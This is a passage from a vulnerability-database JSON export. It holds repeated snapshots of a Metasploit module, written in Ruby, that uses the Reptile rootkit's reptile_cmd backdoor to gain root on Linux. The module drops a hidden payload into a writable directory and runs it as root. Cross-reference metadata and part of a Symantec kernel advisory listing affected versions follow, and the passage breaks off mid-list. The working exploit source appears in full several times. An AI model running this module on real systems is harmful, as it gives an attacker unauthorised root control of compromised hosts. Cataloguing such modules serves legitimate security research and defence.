datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-30T04:38:00", "differentElements": ["sourceData"], "edition": 142}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-31T06:23:57", "history": [], "viewCount": 66, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:1927190131487103720", "KITPLOIT:2253573000113160502", "KITPLOIT:3476689772558392146"]}, {"type": "ossfuzz", "idList": ["OSSFUZZ-22799", "OSSFUZZ-22828", "OSSFUZZ-22736"]}, {"type": "thn", "idList": ["THN:D81EE0440DF268C88DAD844EBDA956EF", "THN:F5F810043642581190E4BB21913894BF"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2223-1:998E3"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0744-1"]}, {"type": "mozilla", "idList": ["MFSA2020-19"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1B84DE2D33648D7FDD0B08B1CC1F1AD8"]}, {"type": "threatpost", "idList": ["THREATPOST:E4BC26425F82A76EE3DA2C72A23E38A3", "THREATPOST:130EDA07603C228BE562B445904A297A"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:DF971420296B93EE8C9E45DB00CEACC3"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:B6B667B4ABD56B3892526FAB5B6C9F2D"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-2337"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892209"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157869"]}], "modified": "2020-05-31T06:23:57", "rev": 2}, "score": {"value": 4.0, "vector": "NONE", "modified": "2020-05-31T06:23:57", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-31T06:23:57", "differentElements": ["sourceData"], "edition": 143}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-31T08:33:54", "history": [], "viewCount": 66, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:3073D5AD7F3554F422710689A9436CAA"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0756-1"]}, {"type": "kitploit", "idList": ["KITPLOIT:8000777826435350228"]}, {"type": "mozilla", "idList": ["MFSA2020-20", "MFSA2020-21"]}, {"type": "ics", "idList": ["ICSA-20-154-01", "ICSA-20-154-02", "ICSA-20-154-05", "ICSA-20-154-03"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892232"]}, {"type": "exploitdb", "idList": ["EDB-ID:48537"]}, {"type": "joomla", "idList": ["JOOMLA-814", "JOOMLA-815"]}, {"type": "cert", "idList": ["VU:636397"]}, {"type": "nessus", "idList": ["JUNIPER_JSA10871.NASL"]}, {"type": "cve", "idList": ["CVE-2020-13694", "CVE-2020-13695", "CVE-2020-9291", "CVE-2014-8938"]}], "modified": "2020-05-31T08:33:54", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2020-05-31T08:33:54", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-31T08:33:54", "differentElements": ["sourceData"], "edition": 144}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-06-03T00:04:40", "history": [], "viewCount": 66, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "securelist", "idList": ["SECURELIST:833C831E498502BB46DD03F0C6F4D597"]}, {"type": "cve", "idList": ["CVE-2019-20812", "CVE-2020-4366", "CVE-2019-14042", "CVE-2020-4503", "CVE-2020-3618", "CVE-2019-20810", "CVE-2019-17603", "CVE-2020-4360", "CVE-2019-20811", "CVE-2020-4431"]}, {"type": "krebs", "idList": ["KREBS:C9E35C975B896B44DADF81EB8C6DFCEB"]}, {"type": "threatpost", "idList": ["THREATPOST:3073D5AD7F3554F422710689A9436CAA"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0756-1"]}, {"type": "kitploit", "idList": ["KITPLOIT:8000777826435350228"]}, {"type": "ics", "idList": ["ICSA-20-154-03"]}, {"type": "nessus", "idList": ["MACOS_FIREFOX_77_0.NASL"]}], "modified": "2020-06-03T00:04:40", "rev": 2}, "score": {"value": 4.6, "vector": "NONE", "modified": "2020-06-03T00:04:40", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-06-03T00:04:40", "differentElements": ["sourceData"], "edition": 145}], "viewCount": 66, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:0993A983825F1C6EB0CFA5D6D04C05CB"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:417EA4BBAF82D660AB3A7B494D8AEC61", "MALWAREBYTES:DF6F5C26F8A875977ACFA9FF48D93496"]}, {"type": "thn", "idList": ["THN:54B521E08BF332B06621B81176A8E99F", "THN:96B1CC4A7203A91DE0E44071518570BB"]}, {"type": "kitploit", "idList": ["KITPLOIT:3176368942952390507"]}, {"type": "securelist", "idList": ["SECURELIST:833C831E498502BB46DD03F0C6F4D597"]}, {"type": "cve", "idList": ["CVE-2019-20810", "CVE-2019-20812", "CVE-2019-20811"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201598", "OPENVAS:1361412562311220201617", "OPENVAS:1361412562311220201613", "OPENVAS:1361412562311220201610", "OPENVAS:1361412562311220201593", "OPENVAS:1361412562311220201616", "OPENVAS:1361412562311220201605", "OPENVAS:1361412562311220201611", "OPENVAS:1361412562311220201596"]}], "modified": "2020-06-03T13:01:39", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2020-06-03T13:01:39", "rev": 2}, "vulnersScore": 5.6}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"]}

{"symantec": [{"lastseen": "2020-01-08T16:40:07", "bulletinFamily": "software", "description": "### Description\n\nLinux Kernel is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause denial-of-service conditions. Versions prior to Linux kernel 5.3 are vulnerable.\n\n### Technologies Affected\n\n * Linux kernel 2.0.0 \n * Linux kernel 2.0.1 \n * Linux kernel 2.0.10 \n * Linux kernel 2.0.11 \n * Linux kernel 2.0.12 \n * Linux kernel 2.0.13 \n * Linux kernel 2.0.14 \n * Linux kernel 2.0.15 \n * Linux kernel 2.0.16 \n * Linux kernel 2.0.17 \n * Linux kernel 2.0.18 \n * Linux kernel 2.0.19 \n * Linux kernel 2.0.2 \n * Linux kernel 2.0.20 \n * Linux kernel 2.0.21 \n * Linux kernel 2.0.22 \n * Linux kernel 2.0.23 \n * Linux kernel 2.0.24 \n * Linux kernel 2.0.25 \n * Linux kernel 2.0.26 \n * Linux kernel 2.0.27 \n * Linux kernel 2.0.28 \n * Linux kernel 2.0.29 \n * Linux kernel 2.0.3 \n * Linux kernel 2.0.30 \n * Linux kernel 2.0.31 \n * Linux kernel 2.0.32 \n * Linux kernel 2.0.33 \n * Linux kernel 2.0.34 \n * Linux kernel 2.0.35 \n * Linux kernel 2.0.36 \n * Linux kernel 2.0.37 \n * Linux kernel 2.0.38 \n * Linux kernel 2.0.39 \n * Linux kernel 2.0.4 \n * Linux kernel 2.0.40 \n * Linux kernel 2.0.5 \n * Linux kernel 2.0.6 \n * Linux kernel 2.0.7 \n * Linux kernel 2.0.8 \n * Linux kernel 2.0.9 \n * Linux kernel 2.1.0 \n * Linux kernel 2.1.132 \n * Linux kernel 2.1.89 \n * Linux kernel 2.2.0 \n * Linux kernel 2.2.1 \n * Linux kernel 2.2.10 \n * Linux kernel 2.2.11 \n * Linux kernel 2.2.12 \n * Linux kernel 2.2.13 \n * Linux kernel 2.2.14 \n * Linux kernel 2.2.15 \n * Linux kernel 2.2.16 \n * Linux kernel 2.2.17 \n * Linux kernel 2.2.18 \n * Linux kernel 2.2.19 \n * Linux kernel 2.2.2 \n * Linux kernel 2.2.20 \n * Linux kernel 2.2.21 \n * Linux kernel 2.2.22 \n * Linux kernel 2.2.23 \n * Linux kernel 2.2.24 \n * Linux kernel 2.2.25 \n * Linux kernel 2.2.26 \n * Linux kernel 2.2.3 \n * Linux kernel 2.2.4 \n * Linux kernel 2.2.5 \n * Linux kernel 2.2.6 \n * Linux kernel 2.2.7 \n * Linux kernel 2.2.8 \n * Linux kernel 2.2.9 \n * Linux kernel 2.3.0 \n * Linux kernel 2.3.1 \n * Linux kernel 2.3.10 \n * Linux kernel 2.3.11 \n * Linux kernel 2.3.12 \n * Linux kernel 2.3.13 \n * Linux kernel 2.3.14 \n * Linux kernel 2.3.15 \n * Linux kernel 2.3.16 \n * Linux kernel 2.3.17 \n * Linux kernel 2.3.18 \n * Linux kernel 2.3.19 \n * Linux kernel 2.3.2 \n * Linux kernel 2.3.20 \n * Linux kernel 2.3.21 \n * Linux kernel 2.3.22 \n * Linux kernel 2.3.23 \n * Linux kernel 2.3.24 \n * Linux kernel 2.3.25 \n * Linux kernel 2.3.26 \n * Linux kernel 2.3.27 \n * Linux kernel 2.3.28 \n * Linux kernel 2.3.29 \n * Linux kernel 2.3.3 \n * Linux kernel 2.3.30 \n * Linux kernel 2.3.31 \n * Linux kernel 2.3.32 \n * Linux kernel 2.3.33 \n * Linux kernel 2.3.34 \n * Linux kernel 2.3.35 \n * Linux kernel 2.3.36 \n * Linux kernel 2.3.37 \n * Linux kernel 2.3.38 \n * Linux kernel 2.3.39 \n * Linux kernel 2.3.4 \n * Linux kernel 2.3.40 \n * Linux kernel 2.3.41 \n * Linux kernel 2.3.42 \n * Linux kernel 2.3.43 \n * Linux kernel 2.3.44 \n * Linux kernel 2.3.45 \n * Linux kernel 2.3.46 \n * Linux kernel 2.3.47 \n * Linux kernel 2.3.48 \n * Linux kernel 2.3.49 \n * Linux kernel 2.3.5 \n * Linux kernel 2.3.50 \n * Linux kernel 2.3.51 \n * Linux kernel 2.3.6 \n * Linux kernel 2.3.7 \n * Linux kernel 2.3.8 \n * Linux kernel 2.3.9 \n * Linux kernel 2.3.99 \n * Linux kernel 2.4.0 \n * Linux kernel 2.4.1 \n * Linux kernel 2.4.10 \n * Linux kernel 2.4.11 \n * Linux kernel 2.4.12 \n * Linux kernel 2.4.13 \n * Linux kernel 2.4.14 \n * Linux kernel 2.4.15 \n * Linux kernel 2.4.16 \n * Linux kernel 2.4.17 \n * Linux kernel 2.4.18 \n * Linux kernel 2.4.19 \n * Linux kernel 2.4.2 \n * Linux kernel 2.4.20 \n * Linux kernel 2.4.21 \n * Linux kernel 2.4.22 \n * Linux kernel 2.4.23 \n * Linux kernel 2.4.24 \n * Linux kernel 2.4.25 \n * Linux kernel 2.4.26 \n * Linux kernel 2.4.27 \n * Linux kernel 2.4.28 \n * Linux kernel 2.4.29 \n * Linux kernel 2.4.3 \n * Linux kernel 2.4.30 \n * Linux kernel 2.4.31 \n * Linux kernel 2.4.32 \n * Linux kernel 2.4.33 2 \n * Linux kernel 2.4.33 \n * Linux kernel 2.4.33.1 \n * Linux kernel 2.4.33.4 \n * Linux kernel 2.4.33.5 \n * Linux kernel 2.4.33.7 \n * Linux kernel 2.4.34 \n * Linux kernel 2.4.34.1 \n * Linux kernel 2.4.34.2 \n * Linux kernel 2.4.34.3 \n * Linux kernel 2.4.34.5 \n * Linux kernel 2.4.34.6 \n * Linux kernel 2.4.35 \n * Linux kernel 2.4.35.2 \n * Linux kernel 2.4.35.3 \n * Linux kernel 2.4.36 \n * Linux kernel 2.4.36.1 \n * Linux kernel 2.4.36.4 \n * Linux kernel 2.4.36.5 \n * Linux kernel 2.4.36.6 \n * Linux kernel 2.4.36.7 \n * Linux kernel 2.4.36.8 \n * Linux kernel 2.4.36.9 \n * Linux kernel 2.4.37 \n * Linux kernel 2.4.37.5 \n * Linux kernel 2.4.37.6 \n * Linux kernel 2.4.37.7 \n * Linux kernel 2.4.37.8 \n * Linux kernel 2.4.37.9 \n * Linux kernel 2.4.4 \n * Linux kernel 2.4.5 \n * Linux kernel 2.4.6 \n * Linux kernel 2.4.7 \n * Linux kernel 2.4.8 \n * Linux kernel 2.4.9 \n * Linux kernel 2.5.1 \n * Linux kernel 2.5.10 \n * Linux kernel 2.5.11 \n * Linux kernel 2.5.12 \n * Linux kernel 2.5.13 \n * Linux kernel 2.5.14 \n * Linux kernel 2.5.15 \n * Linux kernel 2.5.16 \n * Linux kernel 2.5.17 \n * Linux kernel 2.5.18 \n * Linux kernel 2.5.19 \n * Linux kernel 2.5.2 \n * Linux kernel 2.5.20 \n * Linux kernel 2.5.21 \n * Linux kernel 2.5.22 \n * Linux kernel 2.5.23 \n * Linux kernel 2.5.24 \n * Linux kernel 2.5.25 \n * Linux kernel 2.5.26 \n * Linux kernel 2.5.27 \n * Linux kernel 2.5.28 \n * Linux kernel 2.5.29 \n * Linux kernel 2.5.3 \n * Linux kernel 2.5.30 \n * Linux kernel 2.5.31 \n * Linux kernel 2.5.32 \n * Linux kernel 2.5.33 \n * Linux kernel 2.5.34 \n * Linux kernel 2.5.35 \n * Linux kernel 2.5.36 \n * Linux kernel 2.5.37 \n * Linux kernel 2.5.38 \n * Linux kernel 2.5.39 \n * Linux kernel 2.5.4 \n * Linux kernel 2.5.40 \n * Linux kernel 2.5.41 \n * Linux kernel 2.5.42 \n * Linux kernel 2.5.43 \n * Linux kernel 2.5.44 \n * Linux kernel 2.5.45 \n * Linux kernel 2.5.46 \n * Linux kernel 2.5.47 \n * Linux kernel 2.5.48 \n * Linux kernel 2.5.49 \n * Linux kernel 2.5.5 \n * Linux kernel 2.5.50 \n * Linux kernel 2.5.51 \n * Linux kernel 2.5.52 \n * Linux kernel 2.5.53 \n * Linux kernel 2.5.54 \n * Linux kernel 2.5.55 \n * Linux kernel 2.5.56 \n * Linux kernel 2.5.57 \n * Linux kernel 2.5.58 \n * Linux kernel 2.5.59 \n * Linux kernel 2.5.6 \n * Linux kernel 2.5.60 \n * Linux kernel 2.5.61 \n * Linux kernel 2.5.62 \n * Linux kernel 2.5.63 \n * Linux kernel 2.5.64 \n * Linux kernel 2.5.65 \n * Linux kernel 2.5.66 \n * Linux kernel 2.5.67 \n * Linux kernel 2.5.68 \n * Linux kernel 2.5.69 \n * Linux kernel 2.5.7 \n * Linux kernel 2.5.8 \n * Linux kernel 2.5.9 \n * Linux kernel 2.6.0 \n * Linux kernel 2.6.1 \n * Linux kernel 2.6.10 \n * Linux kernel 2.6.11 \n * Linux kernel 2.6.11.1 \n * Linux kernel 2.6.11.10 \n * Linux kernel 2.6.11.11 \n * Linux kernel 2.6.11.12 \n * Linux kernel 2.6.11.2 \n * Linux kernel 2.6.11.3 \n * Linux kernel 2.6.11.4 \n * Linux kernel 2.6.11.5 \n * Linux kernel 2.6.11.6 \n * Linux kernel 2.6.11.7 \n * Linux kernel 2.6.11.8 \n * Linux kernel 2.6.11.9 \n * Linux kernel 2.6.12 \n * Linux kernel 2.6.12.1 \n * Linux kernel 2.6.12.2 \n * Linux kernel 2.6.12.3 \n * Linux kernel 2.6.12.4 \n * Linux kernel 2.6.12.5 \n * Linux kernel 2.6.12.6 \n * Linux kernel 2.6.13 \n * Linux kernel 2.6.13.1 \n * Linux kernel 2.6.13.2 \n * Linux kernel 2.6.13.3 \n * Linux kernel 2.6.13.4 \n * Linux kernel 2.6.13.5 \n * Linux kernel 2.6.14 .1 \n * Linux kernel 2.6.14 .2 \n * Linux kernel 2.6.14 .3 \n * Linux kernel 2.6.14 \n * Linux kernel 2.6.14.1 \n * Linux kernel 2.6.14.2 \n * Linux kernel 2.6.14.3 \n * Linux kernel 2.6.14.4 \n * Linux kernel 2.6.14.5 \n * Linux kernel 2.6.14.6 \n * Linux kernel 2.6.14.7 \n * Linux kernel 2.6.15 .4 \n * Linux kernel 2.6.15 \n * Linux kernel 2.6.15.1 \n * Linux kernel 2.6.15.11 \n * Linux kernel 2.6.15.2 \n * Linux kernel 2.6.15.3 \n * Linux kernel 2.6.15.4 \n * Linux kernel 2.6.15.5 \n * Linux kernel 2.6.15.6 \n * Linux kernel 2.6.15.7 \n * Linux kernel 2.6.16 .1 \n * Linux kernel 2.6.16 .23 \n * Linux kernel 2.6.16 \n * Linux kernel 2.6.16.10 \n * Linux kernel 2.6.16.11 \n * Linux kernel 2.6.16.12 \n * Linux kernel 2.6.16.13 \n * Linux kernel 2.6.16.14 \n * Linux kernel 2.6.16.15 \n * Linux kernel 2.6.16.16 \n * Linux kernel 2.6.16.17 \n * Linux kernel 2.6.16.18 \n * Linux kernel 2.6.16.19 \n * Linux kernel 2.6.16.2 \n * Linux kernel 2.6.16.20 \n * Linux kernel 2.6.16.21 \n * Linux kernel 2.6.16.22 \n * Linux kernel 2.6.16.24 \n * Linux kernel 2.6.16.25 \n * Linux kernel 2.6.16.26 \n * Linux kernel 2.6.16.27 \n * Linux kernel 2.6.16.28 \n * Linux kernel 2.6.16.29 \n * Linux kernel 2.6.16.3 \n * Linux kernel 2.6.16.30 \n * Linux kernel 2.6.16.31 \n * Linux kernel 2.6.16.32 \n * Linux kernel 2.6.16.33 \n * Linux kernel 2.6.16.34 \n * Linux kernel 2.6.16.35 \n * Linux kernel 2.6.16.36 \n * Linux kernel 2.6.16.37 \n * Linux kernel 2.6.16.38 \n * Linux kernel 2.6.16.39 \n * Linux kernel 2.6.16.4 \n * Linux kernel 2.6.16.40 \n * Linux kernel 2.6.16.41 \n * Linux kernel 2.6.16.43 \n * Linux kernel 2.6.16.44 \n * Linux kernel 2.6.16.45 \n * Linux kernel 2.6.16.46 \n * Linux kernel 2.6.16.47 \n * Linux kernel 2.6.16.48 \n * Linux kernel 2.6.16.49 \n * Linux kernel 2.6.16.5 \n * Linux kernel 2.6.16.50 \n * Linux kernel 2.6.16.51 \n * Linux kernel 2.6.16.52 \n * Linux kernel 2.6.16.53 \n * Linux kernel 2.6.16.6 \n * Linux kernel 2.6.16.7 \n * Linux kernel 2.6.16.8 \n * Linux kernel 2.6.16.9 \n * Linux kernel 2.6.17 .8 \n * Linux kernel 2.6.17 \n * Linux kernel 2.6.17.1 \n * Linux kernel 2.6.17.10 \n * Linux kernel 2.6.17.11 \n * Linux kernel 2.6.17.12 \n * Linux kernel 2.6.17.13 \n * Linux kernel 2.6.17.14 \n * Linux kernel 2.6.17.2 \n * Linux kernel 2.6.17.3 